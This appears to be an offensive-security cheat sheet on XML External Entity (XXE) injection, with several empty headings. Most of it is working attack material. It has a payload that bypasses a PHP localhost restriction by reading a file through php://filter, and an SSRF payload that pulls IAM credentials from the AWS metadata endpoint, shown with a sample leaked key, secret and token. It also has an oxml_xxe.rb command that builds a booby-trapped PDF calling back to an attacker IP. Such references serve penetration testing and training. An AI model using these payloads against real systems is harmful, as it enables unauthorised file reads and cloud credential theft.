Link to this headingExternal Entity XML Injection

What Are XML External Entity (XXE) Attacks

Link to this headingBypassing Access Controls with XXE

Default Protections:

if (isset($_SERVER['HTTP_CLIENT_IP']) || isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array(@$_SERVER['REMOTE_ADDR'], array( '127.0.0.1', '::1', )) ) { header('HTTP/1.0 403 Forbidden'); exit( 'You are not allowed to access this file.' ); }

Php Bypass:

<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php" > ]> <results> <result>&harmless;</result> </results>

Link to this headingExternal Error XXE

Link to this headingSSRF

Link to this headingSimple HTTP Connection

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
HTTP/1.1 400 Bad Request Content-Type: application/json Connection: close Content-Length: 546 "Invalid product ID: { "Code" : "Success", "LastUpdated" : "2019-12-12T18:17:44.456491Z", "Type" : "AWS-HMAC", "AccessKeyId" : "rNYgGiw5Wwv34YPVSzpN", "SecretAccessKey" : "m4RaetLQwyQwocJ60xjFJrwYnAJj03K8css1A9Fw", "Token" : "UCj4myxOKROLlb5wPp5Nahw2fHZsG5n1EkOGokbEtj7uCXa8bwoexc2wiX73Picn2AFwHa44f3Snpz02SuEmZtrTgma9Mr2J3Z48tXICOLyP3HgG5Sf7Q2ArYFZQNZoolTXwsX1jN2u2zTOtpoU0V34kcw0axRCXi9JusZ7z9QDrAWRroWeicvkRrKy7dkocW4MsQWxzINiiF39s4F5vRH7GQaKBahwprLJkd4NwH6PDY2IzlSLYpUxQzuJvS4tA", "Expiration" : "2025-12-10T18:17:44.456491Z" }"

Link to this headingGenerate Payloads

Generate DOCX/XLSX/PPTX ODT PDF JPG test files

SVG
PDF
Word Docs

Link to this headingMake a PDF

ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000 |+| Inserting into ./samples/form.pdf. Currently this only tests for PUBLIC DTD |+| Wrote to ./output/o_1636152138.pdf